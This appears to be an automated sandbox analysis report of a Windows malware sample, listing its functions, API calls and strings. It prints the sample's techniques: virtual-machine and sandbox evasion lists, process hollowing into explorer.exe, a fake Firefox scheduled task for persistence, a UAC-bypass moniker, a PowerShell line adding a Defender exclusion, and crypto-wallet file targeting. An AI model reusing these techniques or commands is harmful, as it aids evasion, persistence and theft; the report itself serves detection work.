String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$7$@$ANNA-PC$Admin$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
API String ID: 1854435931-21779633
Opcode ID: 071b1fe9efe4fc9e5e979b574eb1658472291245850e0ec730fd109cf3d90ded
Instruction ID: f6af6dd7b345131bd3b9246d6339faf9b35d34a03d6d68ef2530fff2e2946060
Opcode Fuzzy Hash: 071b1fe9efe4fc9e5e979b574eb1658472291245850e0ec730fd109cf3d90ded
Instruction Fuzzy Hash: 6D22F3B190031CAAEF209BA8DCA8FEE7BFCBF45714F04459AF694E3140D7349A459B60

Function 00151300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 0015132A
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00151343
GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00151439
GetProcAddress.KERNEL32(00000000), ref: 00151440
LoadLibraryA.KERNELBASE(?), ref: 00151459

Strings

kernel32, xrefs: 00151325, 00151434
LoadLibraryA, xrefs: 0015142F

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
String ID: LoadLibraryA$kernel32
API String ID: 3393750808-970291620
Opcode ID: 6ed9bd00da3875aebdad54d0ae3c4c2c64592c6b9f664a82029706237f953714
Instruction ID: 914e9ecbb0444ebffc5610cfb88e5c9475c61173f59cbf47fce1c078b966ac52
Opcode Fuzzy Hash: 6ed9bd00da3875aebdad54d0ae3c4c2c64592c6b9f664a82029706237f953714
Instruction Fuzzy Hash: 3FD1F675E00219EFCB09CF98D890BEDB7B2FF88305F148159E826AB395D774A985CB50

Function 00151710 Relevance: .1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 524f0eff9e74c8ad63a32b74a644895d0cb7185c1cdffe99bc6c990153b9f493
Instruction ID: c98d07c6d26a1b308c7f5563b42444e846579932a6ffc9b6730781242595ee66
Opcode Fuzzy Hash: 524f0eff9e74c8ad63a32b74a644895d0cb7185c1cdffe99bc6c990153b9f493
Instruction Fuzzy Hash: 874139B5D00209EFCF04DF98D881AEEB7B1BF48305F148558D915AB341E734AA45CFA1

Function 00153C30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00153670: task.LIBCPMTD ref: 00153748

LPtoDP.GDI32(00000000,0056AA94,0538CD39), ref: 00153C61
GetLastError.KERNEL32 ref: 00153C6B
ExitProcess.KERNEL32 ref: 00153C78
BuildCommDCBAndTimeoutsA.KERNEL32(eruigoreh ertoerh634643,00000000,00000000), ref: 00153C87
GetCurrentProcess.KERNEL32(00000000), ref: 00153C93
TerminateProcess.KERNEL32(00000000), ref: 00153C9A

Strings

eruigoreh ertoerh634643, xrefs: 00153C82

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeoutstask
String ID: eruigoreh ertoerh634643
API String ID: 3960728841-1078997068
Opcode ID: 91635ee3c4d682a29915c4073a3a721676044de85789131b1b5f2f59e5345322
Instruction ID: c942f98c930e5505f9c8b37416d0fd627ecd9b65d615c59b21744f7e60f13c4e
Opcode Fuzzy Hash: 91635ee3c4d682a29915c4073a3a721676044de85789131b1b5f2f59e5345322
Instruction Fuzzy Hash: A1018670A44208EBD710EFF19D0AB5D7BB4AB08742F104015F931EB590DBB09B4CCB21

Function 010991D0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 010989B0: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 010989EE
Part of subcall function 010989B0: StrStrIW.KERNELBASE(?,Hyper-V), ref: 01098A0D
Part of subcall function 010989B0: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 01098A23
Part of subcall function 010989B0: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 01098A39
Part of subcall function 010989B0: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 01098A4E
Part of subcall function 010989B0: GetModuleHandleA.KERNEL32(kernel32), ref: 01098A59
Part of subcall function 010989B0: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 01098A6D
Part of subcall function 010989B0: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 01098A77
Part of subcall function 010989B0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 01098AA3
Part of subcall function 010989B0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 01098AB6
Part of subcall function 010989B0: GetFileAttributesW.KERNELBASE(?), ref: 01098AC5
Part of subcall function 010989B0: GetFileAttributesW.KERNEL32(?), ref: 01098AD7

ExitProcess.KERNEL32 ref: 010991E1

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$ExitHandleModuleProcess
String ID:
API String ID: 237228072-0
Opcode ID: 12f17515fbea49eb2060bb70485105b135bfdae23970cc8f7780d45bd2a3ce37
Instruction ID: af3a7288f0953f742834c2681b492e73297bf81232ab30887ad5146d56c3556b
Opcode Fuzzy Hash: 12f17515fbea49eb2060bb70485105b135bfdae23970cc8f7780d45bd2a3ce37
Instruction Fuzzy Hash: 20D0121103460E42DF5137F91C397DD37442F73155F048296AAE0992D59D001110B577

Non-executed Functions

Function 01096D30 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 01096D4E
CoCreateInstance.OLE32(01091020,00000000,00000001,01091000,?), ref: 01096D7B
SysAllocString.OLEAUT32(01091498), ref: 01096DC1
SysFreeString.OLEAUT32(?), ref: 01096DFE
SysAllocString.OLEAUT32(\Mozilla), ref: 01096E0F
SysFreeString.OLEAUT32(00000000), ref: 01096E31
SysAllocString.OLEAUT32(\Mozilla), ref: 01096E42
SysFreeString.OLEAUT32(00000000), ref: 01096E58
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 01096E66
SysFreeString.OLEAUT32(00000000), ref: 01096E77
SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 01096EB4
SysFreeString.OLEAUT32(00000000), ref: 01096EC3
SysAllocString.OLEAUT32(Mozilla), ref: 01096ECA
SysFreeString.OLEAUT32(00000000), ref: 01096ED9
SysAllocString.OLEAUT32(PT0S), ref: 01096F2E
SysFreeString.OLEAUT32(00000000), ref: 01096F3D
SysAllocString.OLEAUT32(Trigger1), ref: 01096FAF
SysFreeString.OLEAUT32(00000000), ref: 01096FBE
SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 01096FC5
SysFreeString.OLEAUT32(00000000), ref: 01096FD4
SysAllocString.OLEAUT32(PT1M), ref: 01096FF3
SysFreeString.OLEAUT32(00000000), ref: 01097002
SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 01097083
SysFreeString.OLEAUT32(00000000), ref: 01097092
SysAllocString.OLEAUT32(?), ref: 0109709C
SysFreeString.OLEAUT32(00000000), ref: 010970AB
VariantInit.OLEAUT32(?), ref: 010970DA
SysAllocString.OLEAUT32(0109113C), ref: 010970EE
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 010970FF
SysFreeString.OLEAUT32(00000000), ref: 0109713C
VariantClear.OLEAUT32(?), ref: 01097142

Strings

2023-01-01T12:00:00, xrefs: 01096FC0
Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 01096E61, 010970F0
The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic, xrefs: 01096EAF
C:\Windows\System32\wscript.exe, xrefs: 0109707E
\Mozilla, xrefs: 01096E0A, 01096E3D
PT0S, xrefs: 01096F29
PT1M, xrefs: 01096FEE
Mozilla, xrefs: 01096EC5
Trigger1, xrefs: 01096FAA

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 318146B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
API String ID: 3904693211-3377861604
Opcode ID: 3a502a363c785d6c442dc05b45bd0504012e478939335d33f6db6a70474f9566
Instruction ID: 4b73b8c29d3d90e380529b8452d6ff4600498e5550a508b09b8ab2a9f4584e00
Opcode Fuzzy Hash: 3a502a363c785d6c442dc05b45bd0504012e478939335d33f6db6a70474f9566
Instruction Fuzzy Hash: C8F10A71A00209AFDB10DBA9C858FAEBBF9FF49314F104198F549EB250DB71AD45CBA1

Function 01095FB0 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll), ref: 01095FCD
GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 01095FE1
GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 01095FEC
GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 01095FF7
GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 01096002
GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 0109600D
GetTempPathW.KERNEL32(000000F6,?), ref: 01096026

Part of subcall function 01092690: GetTickCount.KERNEL32 ref: 01092692

wnsprintfW.SHLWAPI ref: 01096061
PathCombineW.SHLWAPI(?,?,?), ref: 0109607B
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 010960A2
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010960C6
SetEndOfFile.KERNEL32(00000000), ref: 010960C9
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 010960D6
wnsprintfW.SHLWAPI ref: 010960F4
RtlInitUnicodeString.NTDLL(?,?), ref: 0109610A
RtlInitUnicodeString.NTDLL(?,?), ref: 01096117
GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 01096156
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 010961A5
WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 010961EF
FlushFileBuffers.KERNEL32(00000000), ref: 010961F7
SetEndOfFile.KERNEL32(00000000), ref: 010961FE
NtQueryInformationProcess.NTDLL ref: 01096213
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 0109623B
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 01096292
WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 010962CE
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 010962DC
NtClose.NTDLL ref: 01096315
NtClose.NTDLL ref: 01096326
NtClose.NTDLL ref: 01096330
CloseHandle.KERNEL32(00000000), ref: 01096333

Strings

NtCreateThreadEx, xrefs: 01096004
NtCreateProcessEx, xrefs: 01095FE3
%08x%s, xrefs: 01096050
RtlCreateProcessParametersEx, xrefs: 01095FEE
"%s", xrefs: 010960E3
RtlDestroyProcessParameters, xrefs: 01095FF9
.exe, xrefs: 0109603F
NtCreateSection, xrefs: 01095FDB
ntdll, xrefs: 01095FC5

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
API String ID: 3548791621-756185880
Opcode ID: dda6b2f1f51c89356728160e23d8afb199c722bd9f5c08a4ea31039b390ce621
Instruction ID: 36301e6a237ab78985cbb14970538e3ce63933f3d1ed19cf792bf77453bac370
Opcode Fuzzy Hash: dda6b2f1f51c89356728160e23d8afb199c722bd9f5c08a4ea31039b390ce621
Instruction Fuzzy Hash: 31B15C71A40209BBEF20DBA5DC59FAEBBBCFB08710F144099F644F7181D775A9409B54

Function 01097900 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 265
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LsaOpenPolicy.ADVAPI32(00000000,0109A060,00000001,?), ref: 0109793C
LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 01097955
GetProcessHeap.KERNEL32(00000008,?), ref: 01097971
HeapAlloc.KERNEL32(00000000), ref: 01097974
LsaFreeMemory.ADVAPI32(?), ref: 010979BB
LsaClose.ADVAPI32(?), ref: 010979C4
GetComputerNameW.KERNEL32(?,?), ref: 010979E0
GetUserNameW.ADVAPI32(?,00000101), ref: 010979F1
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 01097A12
GetProcessHeap.KERNEL32(00000008,00000001), ref: 01097A28
HeapAlloc.KERNEL32(00000000), ref: 01097A2B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 01097A55
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 01097A77
GetProcessHeap.KERNEL32(00000008,00000001), ref: 01097A8D
HeapAlloc.KERNEL32(00000000), ref: 01097A90
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 01097AB5
wsprintfA.USER32 ref: 01097B36
wsprintfA.USER32 ref: 01097B61
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01097BBA
HeapFree.KERNEL32(00000000), ref: 01097BBD
GetProcessHeap.KERNEL32(00000000,?), ref: 01097BC9
HeapFree.KERNEL32(00000000), ref: 01097BCC
GetProcessHeap.KERNEL32(00000000,?), ref: 01097BD8
HeapFree.KERNEL32(00000000), ref: 01097BDB
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01097BE4
HeapFree.KERNEL32(00000000), ref: 01097BE7

Strings

%d|%s|%.16s|, xrefs: 01097B30
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 01097AC2
%s|%d.%d (%d)|%s|%s|%S, xrefs: 01097B5B

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$ByteCharMultiWide$Alloc$NamePolicywsprintf$CloseComputerInformationMemoryOpenQueryUser
String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%s|%s|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 4008773985-1210213088
Opcode ID: d9c9ce29a4bbc2c894f87c1155a60cc3cac9d861776e9430450fa715609bd8c8
Instruction ID: ae95cc97ead6156388f23778061ca8d60bc1ed458137e010e6b003acf9470388
Opcode Fuzzy Hash: d9c9ce29a4bbc2c894f87c1155a60cc3cac9d861776e9430450fa715609bd8c8
Instruction Fuzzy Hash: E891A372A00209AFEF209BA9DC15FAEBBB9FF84710F1441A5FA94E7180D7759901DF60

Function 010993B0 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 192
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,NtQueryInformationProcess,74DF0EE0,?), ref: 010993CC
GetProcAddress.KERNEL32(00000000), ref: 010993D5
GetModuleHandleW.KERNEL32(ntdll.dll,RtlEnterCriticalSection), ref: 010993E4
GetProcAddress.KERNEL32(00000000), ref: 010993E7
GetModuleHandleW.KERNEL32(ntdll.dll,RtlLeaveCriticalSection), ref: 010993F6
GetProcAddress.KERNEL32(00000000), ref: 010993F9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString), ref: 01099408
GetProcAddress.KERNEL32(00000000), ref: 0109940B
GetCurrentProcessId.KERNEL32 ref: 01099439
OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 01099447
ReadProcessMemory.KERNEL32(00000000,?,01097414,00000004,00000000), ref: 01099478
ReadProcessMemory.KERNEL32(00000000,01097408,?,00000004,00000000), ref: 01099492
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 010994A8
StrNCatW.SHLWAPI(?,\explorer.exe,00000105), ref: 010994BF
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 010994D3
lstrcpyW.KERNEL32(00000000,?), ref: 010994E4
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 01099521
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 0109954D
ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000), ref: 0109956C
CloseHandle.KERNEL32(00000000), ref: 010995AF
StrCmpIW.SHLWAPI(?,?), ref: 010995C3

Strings

NtQueryInformationProcess, xrefs: 010993C2
RtlInitUnicodeString, xrefs: 010993FB
\explorer.exe, xrefs: 010994B3
ntdll.dll, xrefs: 010993C7, 010993DC, 010993EE, 01099400
RtlLeaveCriticalSection, xrefs: 010993E9
explorer.exe, xrefs: 01099505, 0109959A
RtlEnterCriticalSection, xrefs: 010993D7

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Process$HandleModule$AddressMemoryProcRead$AllocCloseCurrentDirectoryFileNameOpenVirtualWindowslstrcpy
String ID: NtQueryInformationProcess$RtlEnterCriticalSection$RtlInitUnicodeString$RtlLeaveCriticalSection$\explorer.exe$explorer.exe$ntdll.dll
API String ID: 2609293587-3346233597
Opcode ID: 89ab62abe75fcabe63e8b359f6678659f584d68aecb010fecf33e94c7a5ff031
Instruction ID: 6f8a7de54ce3983872a072213b010b7efc8309a69a6a3ebaa18fc50df131ebf9
Opcode Fuzzy Hash: 89ab62abe75fcabe63e8b359f6678659f584d68aecb010fecf33e94c7a5ff031
Instruction Fuzzy Hash: A5616DB1A40208BBDF20DBA5DC59FAEBBB8EF44711F100195F644E7180DB74DA419BA0

Function 010972C0 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 154
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,010991F1), ref: 010972E6
ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,010991F1), ref: 010972F9
lstrlenW.KERNEL32(?,?,?,?,010991F1), ref: 01097302
ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,010991F1), ref: 0109731D
GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,010991F1), ref: 0109732B
GetLastError.KERNEL32(?,?,?,010991F1), ref: 01097335
wnsprintfW.SHLWAPI ref: 01097357
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 0109736F
wnsprintfW.SHLWAPI ref: 01097389
SetFileAttributesW.KERNEL32(?,00000006), ref: 010973A5
lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 010973B7
GetUserNameW.ADVAPI32(?,?), ref: 010973D6
NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 010973EB
NetApiBufferFree.NETAPI32(00000000), ref: 01097400
CoInitializeEx.OLE32(00000000,?), ref: 01097417
lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 01097431
wsprintfW.USER32 ref: 0109746E
CoGetObject.OLE32(?,?,01092508,00000000), ref: 0109748B
CoUninitialize.OLE32 ref: 010974CB

Strings

%ComSpec%, xrefs: 010972E1
/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'", xrefs: 010973AB
Elevation:Administrator!new:%s, xrefs: 01097461
$, xrefs: 0109745A
"%s", xrefs: 01097378
%ProgramFiles%, xrefs: 01097318
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 0109741D, 0109744F
%ProgramW6432%, xrefs: 010972F4
%%ProgramData%%\r%Sr.js, xrefs: 0109734C

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$Userlstrlenwnsprintf$AttributesBufferDirectoryErrorFileFreeInfoInitializeLastNameObjectSystemUninitializeWow64lstrcpywsprintf
String ID: "%s"$$$%%ProgramData%%\r%Sr.js$%ComSpec%$%ProgramFiles%$%ProgramW6432%$/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"$Elevation:Administrator!new:%s${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 3941589607-3081872691
Opcode ID: 279954542f35fc4f1b51231e2d95ecd28b83bc77621643dd4d57a2fa9b72b01c
Instruction ID: 8e3552fc48bc62fd5962264cb44a7ecfa56d56886a868c7a9c08879859c0d541
Opcode Fuzzy Hash: 279954542f35fc4f1b51231e2d95ecd28b83bc77621643dd4d57a2fa9b72b01c
Instruction Fuzzy Hash: 99516DB2940218ABDF20DB94DC59FDEB7BCBB04714F040095FA89E7140DBB5AA84DFA1

Function 01095C50 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 277
injectionthreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 01095C73
GetProcAddress.KERNEL32(00000000), ref: 01095C7A
CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 01095D3D
NtQueryInformationProcess.NTDLL ref: 01095D5A
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 01095D74
GetThreadContext.KERNEL32(?,00010007), ref: 01095D84
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 01095DB8
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 01095DE2
WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 01095E1B
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 01095EFB
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 01095F13
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 01095F5B
SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 01095F76
ResumeThread.KERNEL32(?,?,?,00000000), ref: 01095F7F
CloseHandle.KERNEL32(?), ref: 01095F8E
CloseHandle.KERNEL32(00000000), ref: 01095F93

Strings

.reloc, xrefs: 01095E71
C:\Windows\system32\explorer.exe, xrefs: 01095CC0, 01095D3C
C:\Windows\system32\certutil.exe, xrefs: 01095CB0
ntdll, xrefs: 01095C6E
NtUnmapViewOfSection, xrefs: 01095C69

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
API String ID: 918112823-4001407722
Opcode ID: b670dbd62a091c83408e48781cba194b2dfa10b89f023a880e5bcefc1ce4816c
Instruction ID: 31b3329ad8bf6d3d662613589280e60f1556cd0e402377c687e1c95455f71dd3
Opcode Fuzzy Hash: b670dbd62a091c83408e48781cba194b2dfa10b89f023a880e5bcefc1ce4816c
Instruction Fuzzy Hash: 99B1B071A00218AFDF21CFA9DC94BEDBBB5FF48314F1440AAEA88E7291D7359941DB10

Function 01097BF0 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 432memorystringCOMMON

Download Yara Rule

APIs

StrCmpNIA.SHLWAPI(?,?,00000000), ref: 01097C3A
wnsprintfA.SHLWAPI ref: 01097CD2
wsprintfA.USER32 ref: 01097CF9
lstrcmpA.KERNEL32(?,Start), ref: 01097F7B
